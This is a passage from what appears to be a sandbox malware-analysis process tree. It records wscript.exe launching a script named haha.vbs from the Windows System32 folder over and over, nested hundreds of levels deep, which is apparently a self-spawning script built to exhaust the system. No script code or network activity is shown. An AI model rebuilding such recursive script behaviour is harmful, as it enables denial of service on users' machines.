        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        169⤵
        
        PID:6836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        170⤵
        
        PID:13124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        171⤵
        
        PID:6168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        172⤵
        
        PID:12480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        173⤵
        
        PID:7332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        174⤵
        
        PID:12652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        175⤵
        
        PID:7592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        176⤵
        
        PID:13168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        177⤵
        
        PID:13304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        178⤵
        
        PID:8096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        179⤵
        
        PID:1760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        180⤵
        
        PID:5208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        181⤵
        
        PID:13344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        182⤵
        
        PID:13468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        183⤵
        
        PID:13516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        184⤵
        
        PID:13568
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        185⤵
        
        PID:13620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        186⤵
        
        PID:13672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        187⤵
        
        PID:13728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        188⤵
        
        PID:13780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        189⤵
        
        PID:13832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        190⤵
        
        PID:13884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        191⤵
        
        PID:13936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        192⤵
        
        PID:13996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        193⤵
        
        PID:14048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        194⤵
        
        PID:14100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        195⤵
        
        PID:14192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        196⤵
        
        PID:14264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        197⤵
        
        PID:13320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        198⤵
        
        PID:13396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        199⤵
        
        PID:3128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        200⤵
        
        PID:13724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        201⤵
        
        PID:5396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        202⤵
        
        PID:14124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        203⤵
        
        PID:14324
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        204⤵
        
        PID:9432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        205⤵
        
        PID:8716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        206⤵
        
        PID:9832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        207⤵
        
        PID:9880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        208⤵
        
        PID:8628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        209⤵
        
        PID:4652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        210⤵
        
        PID:2968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        211⤵
        
        PID:8832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        212⤵
        
        PID:10264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        213⤵
        
        PID:14344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        214⤵
        
        PID:14392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        215⤵
        
        PID:14440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        216⤵
        
        PID:14496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        217⤵
        
        PID:14548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        218⤵
        
        PID:14596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        219⤵
        
        PID:14652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        220⤵
        
        PID:14704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        221⤵
        
        PID:14760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        222⤵
        
        PID:14816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        223⤵
        
        PID:14868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        224⤵
        
        PID:14916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        225⤵
        
        PID:14964
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        226⤵
        
        PID:15016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        227⤵
        
        PID:15068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        228⤵
        
        PID:15124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        229⤵
        
        PID:15176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        230⤵
        
        PID:15228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        231⤵
        
        PID:15280
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        232⤵
        
        PID:15332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        233⤵
        
        PID:10660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        234⤵
        
        PID:10816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        235⤵
        
        PID:5064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        236⤵
        
        PID:11248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        237⤵
        
        PID:10744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        238⤵
        
        PID:4536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        239⤵
        
        PID:2692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        240⤵
        
        PID:11676
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        241⤵
        
        PID:14944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        242⤵
        
        PID:11392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        243⤵
        
        PID:12064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        244⤵
        
        PID:1320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        245⤵
        
        PID:6384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        246⤵
        
        PID:1148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        247⤵
        
        PID:6744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        248⤵
        
        PID:11084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        249⤵
        
        PID:7104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        250⤵
        
        PID:6748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        251⤵
        
        PID:6988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        252⤵
        
        PID:12956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        253⤵
        
        PID:6760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        254⤵
        
        PID:15388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        255⤵
        
        PID:15444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        256⤵
        
        PID:15496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        257⤵
        
        PID:15548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        258⤵
        
        PID:15596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        259⤵
        
        PID:15648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        260⤵
        
        PID:15700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        261⤵
        
        PID:15752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        262⤵
        
        PID:15808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        263⤵
        
        PID:15856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        264⤵
        
        PID:15944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        265⤵
        
        PID:16032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        266⤵
        
        PID:16084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        267⤵
        
        PID:16132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        268⤵
        
        PID:16188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        269⤵
        
        PID:16240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        270⤵
        
        PID:16288
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        271⤵
        
        PID:16360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        272⤵
        
        PID:5288
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        273⤵
        
        PID:7316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        274⤵
        
        PID:7732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        275⤵
        
        PID:13272
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        276⤵
        
        PID:15888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        277⤵
        
        PID:15920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        278⤵
        
        PID:4228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        279⤵
        
        PID:5860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        280⤵
        
        PID:2760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        281⤵
        
        PID:15364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        282⤵
        
        PID:16368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        283⤵
        
        PID:15524
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        284⤵
        
        PID:13856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        285⤵
        
        PID:14020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        286⤵
        
        PID:8004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        287⤵
        
        PID:8824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        288⤵
        
        PID:2228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        289⤵
        
        PID:14332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        290⤵
        
        PID:9444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        291⤵
        
        PID:8872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        292⤵
        
        PID:16356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        293⤵
        
        PID:8424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        294⤵
        
        PID:9820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        295⤵
        
        PID:9968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        296⤵
        
        PID:13668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        297⤵
        
        PID:10068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        298⤵
        
        PID:13908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        299⤵
        
        PID:14260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        300⤵
        
        PID:10300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        301⤵
        
        PID:12296
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        302⤵
        
        PID:10640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        303⤵
        
        PID:14544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        304⤵
        
        PID:11236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        305⤵
        
        PID:8780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        306⤵
        
        PID:664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        307⤵
        
        PID:10520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        308⤵
        
        PID:15328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        309⤵
        
        PID:11480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        310⤵
        
        PID:10984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        311⤵
        
        PID:11844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        312⤵
        
        PID:11376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        313⤵
        
        PID:14988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        314⤵
        
        PID:12256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        315⤵
        
        PID:8512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        316⤵
        
        PID:12036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        317⤵
        
        PID:16404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        318⤵
        
        PID:16496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        319⤵
        
        PID:16568
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        320⤵
        
        PID:16620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        321⤵
        
        PID:16672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        322⤵
        
        PID:16724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        323⤵
        
        PID:16788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        324⤵
        
        PID:16836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        325⤵
        
        PID:16888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        326⤵
        
        PID:16940
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        327⤵
        
        PID:16992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        328⤵
        
        PID:17044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        329⤵
        
        PID:17096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        330⤵
        
        PID:17148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        331⤵
        
        PID:17200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        332⤵
        
        PID:17252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        333⤵
        
        PID:17300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        334⤵
        
        PID:17352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        335⤵
        
        PID:17404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        336⤵
        
        PID:3316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        337⤵
        
        PID:7092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        338⤵
        
        PID:16456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        339⤵
        
        PID:15384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        340⤵
        
        PID:16864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        341⤵
        
        PID:13260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        342⤵
        
        PID:1912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        343⤵
        
        PID:17280
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        344⤵
        
        PID:12220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        345⤵
        
        PID:12344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        346⤵
        
        PID:13840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        347⤵
        
        PID:13144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        348⤵
        
        PID:5180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        349⤵
        
        PID:17328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        350⤵
        
        PID:9052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        351⤵
        
        PID:14004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        352⤵
        
        PID:16236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        353⤵
        
        PID:1108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        354⤵
        
        PID:9264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        355⤵
        
        PID:8464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        356⤵
        
        PID:13896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        357⤵
        
        PID:9448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        358⤵
        
        PID:1008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        359⤵
        
        PID:14608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        360⤵
        
        PID:13644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        361⤵
        
        PID:9152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        362⤵
        
        PID:7440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        363⤵
        
        PID:5528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        364⤵
        
        PID:4092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        365⤵
        
        PID:15136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        366⤵
        
        PID:17412
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        367⤵
        
        PID:17464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        368⤵
        
        PID:17520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        369⤵
        
        PID:17572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        370⤵
        
        PID:17668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        371⤵
        
        PID:17760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        372⤵
        
        PID:17864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        373⤵
        
        PID:17972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
